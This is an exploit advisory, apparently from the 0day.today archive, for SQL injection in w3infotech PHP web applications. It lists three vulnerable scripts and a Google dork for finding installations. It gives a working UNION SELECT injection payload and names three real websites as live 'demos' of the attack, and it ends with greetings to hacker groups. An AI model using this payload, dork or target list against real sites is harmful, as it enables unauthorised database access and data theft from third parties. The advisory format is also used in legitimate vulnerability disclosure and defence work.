Exploit for php platform in category web applications
####
# Exploit Title: w3infotech Multiple Sql Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: http://www.facebook.com/ALG.Cyber.Army
# E-mail: [email protected]
# Category:: webapps
# Vendor: http://www.w3infotech.com
# Google Dork: intext:"Powered by w3infotech"
# Security Risk: Hight
# Tested on: Windows Seven Edition Integral / French
####
# Note ! : another exploit http://www.exploit-db.com/exploits/10222/ with title "( Auth Bypass ) SQL Injection Vulnerability " , but there's just a Bypass exploit without a sqli exploit.
[*] Vulnerable Files :
photogal_photo.php
projects_display.php
gallery_view.php
[*] Explo!T :
Payload: id=11' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,101,113,117,58),IFNULL(CAST(CHAR(67,69,67,118,83,100,122,79,76,85) AS CHAR),CHAR(32)),CHAR(58,122,98,102,58))# AND 'iQUP'='iQUP
[*] Demos :
http://qtcgqatar.com/photogal_photo.php?id=3
http://www.hulldm.com/gallery_view.php?id=7
http://www.iproplan.com/projects_display.php?id=34
# Greets To : ==============================================================================
# The Algerian Cyber Army Team , KedAns-Dz , Klashincov3 , Kha&Mix , King Of Pirates ,
# jos_ali_joe , All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (exploit-db.com)
# ... And All Algerian Hax0rs
============================================================================================
# 0day.today [2018-04-02] #